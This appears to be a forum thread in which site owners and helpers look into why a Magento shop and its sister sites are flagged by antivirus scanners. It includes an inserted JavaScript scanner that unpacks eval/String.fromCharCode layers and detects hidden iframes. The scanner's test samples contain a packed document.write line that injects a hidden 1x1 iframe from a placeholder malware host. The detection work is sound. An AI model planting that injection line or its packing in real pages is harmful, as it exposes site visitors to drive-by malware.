Need help with "MALICIOUS URL BLOCKED"

Hi

Our website has been blocked by avast and we have no idea why! Url is wxw.fluffheaven.com

This is causing us a lot of issues as a lot of our clients can’t get on.

Are we missing something obvious?

Thanks for your help, we are desperate to sort this out.

Have run through http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fwww.fluffheaven.com and all seems fine?

It is on the Bitdefender block list, and CleanMX has it as suspicious.
https://www.virustotal.com/en/url/4e983c9e46d72983f7d9a61c4c36996a2c1a63641579bf9a12ef70b5f75f3b8c/analysis/1376660965/

IDS alert from Suricata filter. http://urlquery.net/report.php?id=4587636

Zulu says malicious URL. http://zulu.zscaler.com/submission/show/d84deee463df2b9efe4963d2ca69d58f-1376661374

Quttera says suspicious. http://quttera.com/detailed_report/fluffheaven.com

Thanks for those links, off to investigate.

What would cause the Bitdefender block?

guess you need to ask Bitdefender…

It has malware on it according to Bitdefender: http://trafficlight.bitdefender.com/info?url=www.fluffheaven.com&language=en_US

There are 18 potentially suspicious files: http://www.quttera.com/detailed_report/www.fluffheaven.com

URLQuery: http://urlquery.net/report.php?id=4587915

Hi Steven Winderlich,

Why did you recapitulate an earlier posting in the thread? Or didn't you notice?

polonus

I hadn't noticed that, sorry… :smiley:

We have cleaned up the issues listed on Quttera, no idea about Bitdefender. No idea what they think the cause is. Lodged a query on their forum, so hoping we get some help.

Thanks for the help guys

The IDS alert comes under the web client rules classification. It is an "overflow exploit" rule that is being flagged in this case.
The potentially suspicious files all have eval packed as the initialization of a function pointer to the JavaScript method fromCharCode.
But this should come into play in combination with an iFrame:
http://www.quttera.com/detailed_report/www.fluffheaven.com#ReportTabPotSusp
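As an added example (not code from this thread, from Quttera, or from fluffheaven.com), the JavaScript below unpacks the eval/String.fromCharCode layer described in the post, follows an alias of the form `var q=String.fromCharCode;eval(q(...))`, decodes nested layers, and reports a decoded hidden iframe as malicious while plain eval-of-packed-text is only suspicious. The sample payloads, the alias names and the `malware.example.invalid` target are constructed for illustration.

```javascript
// Added example, not code from the thread or from fluffheaven.com: unpack the
// eval(String.fromCharCode(...)) layer that scanners flag and check whether the
// hidden text injects an iframe. All sample input below is constructed.

// Find String.fromCharCode(...) calls with literal numeric arguments, including
// calls made through an alias, e.g. "var q=String.fromCharCode;eval(q(104,...))".
function fromCharCodeCalls(js) {
  const aliasRe = /(?:var|let|const)\s+([A-Za-z_$][\w$]*)\s*=\s*String\.fromCharCode\s*;/g;
  const names = ['String\\.fromCharCode'];
  let m;
  while ((m = aliasRe.exec(js)) !== null) {
    names.push(m[1].replace(/\$/g, '\\$'));
  }
  const callRe = new RegExp(
    '\\b(?:' + names.join('|') + ')\\s*\\(\\s*(\\d+(?:\\s*,\\s*\\d+)*)\\s*\\)', 'g');
  const decoded = [];
  while ((m = callRe.exec(js)) !== null) {
    decoded.push(m[1].split(',').map(n => String.fromCharCode(Number(n))).join(''));
  }
  return decoded;
}

// Decode repeatedly: the decoded text is often itself another packed layer.
function unpackLayers(js, maxDepth = 5) {
  const layers = [];
  let pending = [js];
  for (let depth = 0; depth < maxDepth && pending.length > 0; depth++) {
    const next = [];
    for (const text of pending) {
      for (const d of fromCharCodeCalls(text)) {
        layers.push(d);
        next.push(d);
      }
    }
    pending = next;
  }
  return layers;
}

const IFRAME_RE = /<iframe\b[^>]*>/i;
const HIDDEN_RE = /visibility\s*:\s*hidden|display\s*:\s*none|\b(?:width|height)\s*=\s*["']?[01]\b/i;
const SRC_RE = /\bsrc\s*=\s*["']?([^"'\s>]+)/i;

// Returns {usesEval, layers, findings, verdict}. A packed layer that writes a
// hidden iframe is malicious; eval of a packed layer with no iframe is only
// suspicious, because packers and legitimate loaders use the same construct.
function scanScript(js) {
  const usesEval = /\beval\s*\(/.test(js);
  const layers = unpackLayers(js);
  const findings = [];
  for (const text of layers) {
    const tag = text.match(IFRAME_RE);
    if (!tag) continue;
    const src = tag[0].match(SRC_RE);
    findings.push({ src: src ? src[1] : null, hidden: HIDDEN_RE.test(tag[0]) });
  }
  let verdict = 'clean';
  if (findings.some(f => f.hidden)) verdict = 'malicious';
  else if (usesEval && layers.length > 0) verdict = 'suspicious';
  return { usesEval, layers, findings, verdict };
}

// Constructed samples (hypothetical); the iframe target uses the reserved .invalid TLD.
function packAsFromCharCode(s, alias) {
  const codes = Array.from(s, c => c.charCodeAt(0)).join(',');
  return alias
    ? `var ${alias}=String.fromCharCode;eval(${alias}(${codes}));`
    : `eval(String.fromCharCode(${codes}));`;
}
const HIDDEN_IFRAME =
  `document.write('<iframe src="http://malware.example.invalid/in.php" width=1 height=1 style="visibility:hidden"></iframe>');`;
const SAMPLES = {
  injected: packAsFromCharCode(HIDDEN_IFRAME, 'q'),
  doublePacked: packAsFromCharCode(packAsFromCharCode(HIDDEN_IFRAME), 'x'),
  benign: 'var s = String.fromCharCode(72,105); document.title = s;',
};

for (const [name, js] of Object.entries(SAMPLES)) {
  const r = scanScript(js);
  console.log(name, r.verdict, JSON.stringify(r.findings));
}
```

Run it with node; the `injected` and `doublePacked` samples come out as malicious with the decoded iframe src reported, the `benign` one as clean. The width/height check catches the 1x1 frames typical of this kind of injection even when no CSS hides them, and the depth limit keeps a pathological self-referencing payload from looping.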

The plot thickens on this one!

Fluffheaven is a Magento install; in total 4 sites are on the same Magento installation and the same hosting. Fluffheaven's results are above.

babame.com comes up completely clean on https://www.virustotal.com/en/url/001d48f5312d4fff76d6f0ec5aa798585f910d6f4f05f53e3a2dd51888dcbde7/analysis/ but Avast is blocking it

babatoys.co.uk comes up with 2 issues on Bitdefender and Kaspersky, https://www.virustotal.com/en/url/23634f97521604508d3bea6974718ca40effb4a63a1e226cd5be1cf30d32aed0/analysis/

bababump.com is the same as babatoys, 2 issues https://www.virustotal.com/en/url/3c3f6e803024856ff37056ee6e15a3760550aff3d155f8a9fd9fd53b8befe6db/analysis/1376675497/

The hosting company is in the middle of running a maldet scan on the server, so far clean but still running.

Why would 4 sites, all on the same database, throw up such varying results!

Polonus, I think we have now removed that code/frames, and quttera.com is showing OK now on rescan.

Magento recently had to be updated. Avast! Web Shield is even alerting on this link for the malicious code on the Magento website: htxp://stackoverflow.com/questions/13822419/clients-magento-website-contains-malicious-code-how-to-get-rid-of-it as infested with JS:iFrame-AGU[Trj].
This also played in May of this year and later, so recently: a Magento store can be hacked due to compromised FTP credentials, an insecure web host, a vulnerable extension, a weak password, or an outdated Magento installation. → http://blog.sucuri.net/2012/07/magento-security-update-1-7-0-2-zend_xmlrpc-vulnerability.html (also flagged by avast! Webshield as PHP:Backdoor-BG[Trj])

polonus